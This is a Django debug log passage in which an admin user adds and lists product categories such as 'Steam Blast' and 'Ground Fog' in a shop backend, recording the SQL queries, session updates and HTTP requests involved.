13:09:05,898 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:09:05.896094+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 9, 5, 896094, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:09:05] "GET /shop/category/add/ HTTP/1.0" 200 8435 DEBUG 2019-12-13 13:09:06,231 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:06.222347+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 6, 222347, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:06,233 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:09:06] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:09:25,224 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:25.213518+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 25, 213518, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:25,228 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:09:25,236 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:09:25,242 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 4 LIMIT 1; args=(4,) DEBUG 2019-12-13 13:09:25,244 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 4 AND "shop_category"."slug" = 'steam-blast') LIMIT 1; args=(4, 'steam-blast') DEBUG 2019-12-13 13:09:25,246 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Steam Blast' LIMIT 1; args=('Steam Blast',) DEBUG 2019-12-13 13:09:25,250 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Steam Blast' AND "shop_category"."parent_id" = 4) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Steam Blast', 4) DEBUG 2019-12-13 13:09:25,253 utils 11259 139831317362432 (0.000) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(4,) DEBUG 2019-12-13 13:09:25,254 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 6 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 6, 3, 3] DEBUG 2019-12-13 13:09:25,258 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Steam Blast', 4, 'categories/2019/12/13/collection4_ykrPiOh.png', 'Steam Blast', false, 'steam-blast', 4, 5, 6, 1) RETURNING "shop_category"."id"; args=('Steam Blast', 4, 'categories/2019/12/13/collection4_ykrPiOh.png', 'Steam Blast', False, 'steam-blast', 4, 5, 6, 1) DEBUG 2019-12-13 13:09:25,261 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:09:25.259572+00:00'::timestamptz, 6, 8, '27', 'Steam Blast', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 9, 25, 259572, tzinfo=), 6, 8, '27', 'Steam Blast', 1, '[{"added": {}}]') [13/Dec/2019 13:09:25] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:09:25,567 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:25.553261+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 25, 553261, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:25,571 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:09:25,643 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:09:25,717 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:09:25.714010+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 9, 25, 714010, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:09:25] "GET /shop/category/add/ HTTP/1.0" 200 8478 DEBUG 2019-12-13 13:09:26,059 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:26.044522+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 26, 44522, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:26,063 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:09:26] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:09:42,446 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:42.437373+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 42, 437373, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:42,449 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:09:42,456 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:09:42,460 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 4 LIMIT 1; args=(4,) DEBUG 2019-12-13 13:09:42,462 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 4 AND "shop_category"."slug" = 'steam-blast') LIMIT 1; args=(4, 'steam-blast') DEBUG 2019-12-13 13:09:42,464 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Steam Blast' LIMIT 1; args=('Steam Blast',) DEBUG 2019-12-13 13:09:42,513 utils 11259 139831317362432 (0.001) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:09:42,561 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:09:42.558887+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 9, 42, 558887, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:09:42] "POST /shop/category/add/ HTTP/1.0" 200 8566 DEBUG 2019-12-13 13:09:42,924 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:42.911587+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 42, 911587, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:42,927 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:09:42] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:10:13,175 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:10:13.166011+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 10, 13, 166011, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:10:13,178 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:10:13,185 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:10:13,189 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 4 LIMIT 1; args=(4,) DEBUG 2019-12-13 13:10:13,191 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 4 AND "shop_category"."slug" = 'steam-blast') LIMIT 1; args=(4, 'steam-blast') DEBUG 2019-12-13 13:10:13,192 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Ground Fog' LIMIT 1; args=('Ground Fog',) DEBUG 2019-12-13 13:10:13,239 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:10:13,302 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:10:13.299222+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 10, 13, 299222, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:10:13] "POST /shop/category/add/ HTTP/1.0" 200 8482 DEBUG 2019-12-13 13:10:13,653 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:10:13.641398+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 10, 13, 641398, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:10:13,656 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:10:13] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:10:30,422 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:10:30.409099+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 10, 30, 409099, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:10:30,426 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:10:30,430 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:10:30,431 utils 11259 139831317362432 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:10:30,440 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 13:10:30,652 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:10:30.649899+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 10, 30, 649899, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:10:30] "GET /shop/category/ HTTP/1.0" 200 10936 DEBUG 2019-12-13 13:10:30,995 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:10:30.986868+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 10, 30, 986868, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:10:30,998 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:10:31] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:10:40,275 utils 11259 139831317362432 (0.007) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:10:40.257773+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 10, 40, 257773, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:10:40,280 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:10:40,366 utils 11259 139831317362432 (0.004) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:10:40,446 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:10:40.443205+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 10, 40, 443205, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:10:40] "GET /shop/category/add/ HTTP/1.0" 200 8260 DEBUG 2019-12-13 13:10:40,799 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:10:40.786421+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 10, 40, 786421, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:10:40,805 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:10:40] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:11:01,243 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:01.234643+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 1, 234643, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:01,247 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:11:01,254 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:11:01,257 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 4 LIMIT 1; args=(4,) DEBUG 2019-12-13 13:11:01,259 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 4 AND "shop_category"."slug" = 'ground-fog') LIMIT 1; args=(4, 'ground-fog') DEBUG 2019-12-13 13:11:01,260 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Ground Fog' LIMIT 1; args=('Ground Fog',) DEBUG 2019-12-13 13:11:01,264 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Ground Fog' AND 